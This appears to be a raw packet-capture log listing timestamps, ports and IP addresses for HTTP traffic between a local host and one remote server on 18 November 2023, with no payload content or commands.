Nov 18, 2023 10:02:36.237910032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.237958908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238087893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238105059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238121986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238141060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238154888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238157034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238173962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238190889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238200903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238208055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238218069 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238224030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238243103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238260031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238260031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238276005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238292933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238293886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238311052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238348961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238369942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238387108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238399982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238404989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238423109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238439083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238440037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238456011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238456964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238471985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238487959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238497019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238504887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238522053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238538980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238550901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238554955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238568068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238570929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238588095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238605022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238605976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238620996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238625050 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238637924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238653898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238667011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238672018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238687992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238691092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238703966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238717079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238717079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238722086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238739014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238754988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238766909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238771915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238789082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238789082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238805056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238821030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238822937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238837957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238853931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238869905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238869905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238886118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238898039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238903046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238917112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238920927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238938093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238954067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238954067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.238971949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238987923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.238991022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239005089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239022017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239038944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239077091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239083052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239100933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239118099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239134073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239135981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239154100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239171028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239206076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239216089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239233017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239248991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239265919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239281893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239286900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239308119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239325047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239332914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239341974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239352942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239389896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239398956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239407063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239423037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239439964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239459038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239464998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239475965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239494085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239500046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239510059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239517927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239542961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239557981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239559889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239578009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239595890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239612103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239619970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239639044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239644051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239660978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239677906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239695072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239702940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239711046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239727974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239738941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239746094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239763021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239763021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239780903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239814997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239871025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239901066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239918947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239936113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239952087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239968061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.239974022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.239984035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240000963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240014076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240019083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240032911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240036011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240053892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240071058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240081072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240087986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240104914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240118980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240124941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240137100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240143061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240176916 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240204096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240221024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240238905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240257025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240261078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240273952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240289927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240294933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240305901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240323067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240329981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240339041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240355968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240365028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240371943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240390062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240406036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240408897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240422964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240427971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240439892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240457058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240473986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240483046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240492105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240503073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240509033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240525961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240540981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240542889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240560055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240576982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240577936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240593910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240593910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240611076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240627050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240629911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240643024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240653992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240658998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240672112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240677118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240696907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240700960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240712881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240729094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240745068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240750074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240761042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240777969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240784883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240793943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240808010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240811110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240828037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240839005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240844011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240861893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240878105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240879059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240895987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240899086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240911961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240930080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240938902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240947008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240962982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240976095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.240979910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240998030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.240999937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241017103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241033077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241035938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241050005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241065025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241074085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241081953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241097927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241111040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241115093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241130114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241132021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241148949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241164923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241182089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241185904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241198063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241214037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241230965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241234064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241252899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241256952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241272926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241283894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241288900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241302013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241307020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241324902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241339922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241341114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241358042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241374016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241379976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241390944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241408110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241425037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241430998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241441011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241457939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241466999 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241472960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241487980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241489887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241507053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241519928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241524935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241542101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241558075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241561890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241574049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241583109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241590977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241606951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241622925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241625071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241638899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241656065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241657019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241672993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241674900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241688967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241705894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241722107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241728067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241738081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241755009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241765976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241770983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241782904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241787910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241806030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241816044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241822004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241837978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241853952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241872072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241875887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241888046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241904974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241910934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241920948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241933107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.241938114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241954088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241970062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.241986036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242000103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242003918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242022038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242038012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242041111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242054939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242070913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242088079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242093086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242104053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242120981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242136955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242137909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242152929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242168903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242182016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242186069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242202044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242204905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242218018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242233992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242238045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242252111 CET	80	49744	194.49.94.120	192.168.2.4
